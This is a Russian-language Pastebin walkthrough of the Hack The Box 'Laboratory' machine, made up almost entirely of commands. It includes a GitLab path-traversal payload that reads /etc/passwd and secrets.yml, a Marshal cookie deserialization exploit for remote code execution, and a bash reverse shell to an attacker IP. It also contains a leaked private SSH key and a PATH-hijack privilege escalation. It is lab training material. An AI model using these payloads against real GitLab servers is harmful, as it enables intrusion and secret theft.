Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Открываем терминал
- cd Desktop/
- sudo openvpn askanton.ovpn
- Делим терминал горизонтально
- ping 10.10.10.216
- открываем новый терминал
- Сканируем
- nmap -A 10.10.10.216
- Находим сайт, и дополнительный домен
- Добавляем в хостс
- sudo nano /etc/hosts
- 10.10.10.216 laboratory.htb git.laboratory.htb
- Заходим laboratory.htb
- Находим пользователей
- Dexter и Deedee
- Проверяем гоубастером
- gobuster dir -u https://laboratory.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
- переходим на https://git.laboratory.htb/
- Регистрируемся
- username@laboratory.htb
- Заходим на https://git.laboratory.htb/help
- Смотрим версию
- Ищем уязвимости для данной версии и находим:
- https://hackerone.com/reports/827052
- Делаем следующее:
- 1.Создаем Project1
- 2.Создаем Project11
- 3.В Project1 создаем issue с описанием ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
- 4.Пермещаем issue в Project11
- 5. Получаем файл passwd
- Повоторяем аналогичные шаги только теперь с описанием:
- ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
- Получаем secrets.yml
- secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
- Теперь нам понадобиться такая же версия гитлаб на нашей кали
- Качаем https://packages.gitlab.com/gitlab/gitlab-ce/packages/ubuntu/xenial/gitlab-ce_12.8.1-ce.0_amd64.deb
- Добавляем репозитории sudo curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh
- Переходим в папку с гитом и запускаем установку
- cd /home/kali/Downloads/
- sudo dpkg -i gitlab-ce_12.8.1-ce.0_amd64.deb
- запускаем gitlab-ctl reconfigure
- Меняем значение ключа
- sudo nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
- sudo gitlab-ctl restart
- Переходим в консоль
- sudo gitlab-rails console
- Продолжаем идти по инструкции из https://hackerone.com/reports/827052, генерируем cookie
- поднимаем сервер куда будем передавать реверсшел
- nc -nlvp 7777
- поднимаем сервер с которого будем забирать шелл
- python3 -m http.server 5555
- создаем шелл
- nano /home/kali/rev.sh
- #!/bin/bash
- bash -i >& /dev/tcp/10.10.14.46/7777 0>&1
- Делаем запрос в наш гитлаб на скачивание шела
- request = ActionDispatch::Request.new(Rails.application.env_config)
- request.env["action_dispatch.cookies_serializer"] = :marshal
- cookies = request.cookie_jar
- erb = ERB.new("<%= `curl 10.10.14.141:5555/rev11.sh -o /tmp/rev11.sh` %>")
- depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
- cookies.signed[:cookie] = depr
- puts cookies[:cookie]
- Вставляем полученный куки в команду ниже:
- curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiUiNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC90bXAvcmV2LnNoYCApLnRvX3MpOyBfZXJib3V0BjoGRUY6DkBlbmNvZGluZ0l1Og1FbmNvZGluZwpVVEYtOAY7CkY6E0Bmcm96ZW5fc3RyaW5nMDoOQGZpbGVuYW1lMDoMQGxpbmVub2kAOgxAbWV0aG9kOgtyZXN1bHQ6CUB2YXJJIgxAcmVzdWx0BjsKVDoQQGRlcHJlY2F0b3JJdTofQWN0aXZlU3VwcG9ydDo6RGVwcmVjYXRpb24ABjsKVA==--19ae61e1131857582525c4271376e31a46e253ad" -k
- Делаем запрос в наш гитлаб на запуск шела
- request = ActionDispatch::Request.new(Rails.application.env_config)
- request.env["action_dispatch.cookies_serializer"] = :marshal
- cookies = request.cookie_jar
- erb = ERB.new("<%= `bash /tmp/rev.sh` %>")
- depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
- cookies.signed[:cookie] = depr
- puts cookies[:cookie]
- Вставляем полученный куки в команду ниже:
- curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kibiNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBjdXJsIDEwLjEwLjE0LjE0MTo1NTU1L3Jldi5zaCAtbyAvdG1wL3Jldi5zaGAgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ" -k
- Смотрим кто мы
- id
- Смотрим как сбросить пароль пользователя на гитлаб
- https://docs.gitlab.com/ee/security/reset_user_password.html
- gitlab-rails console -e production
- user = User.where(id: 1).first
- user.password = 'password'
- user.password_confirmation = 'password'
- user.save!
- заходим на https://git.laboratory.htb/ под Декстером
- Находим ключ от ssh
- https://git.laboratory.htb/dexter/securedocker/-/blob/master/dexter/.ssh/id_rsa
- -----BEGIN OPENSSH PRIVATE KEY-----
- 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
- -----END OPENSSH PRIVATE KEY-----
- Создаем файлик rsa
- nano rsa
- chmod 600 rsa
- конектимся к машине используя rsa
- ssh -i rsa dexter@10.10.10.216
- забираем ключ пользователя
- Читаем про SUID
- Смотрим что нам доступно
- find / -perm -4000 2>/dev/null
- Находим /usr/local/bin/docker-security
- Читаем про уязвимость гитлаба
- https://gitlab.com/gitlab-org/gitlab-foss/-/issues/20582
- cd /var/tmp
- echo "/bin/bash" > chmod
- ls
- cat chmod
- Даем доступ к файлу
- chmod 777 chmod
- echo $PATH
- export PATH=.:${PATH}
- echo $PATH
- /usr/local/bin/docker-security
- забираем ключ рута
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement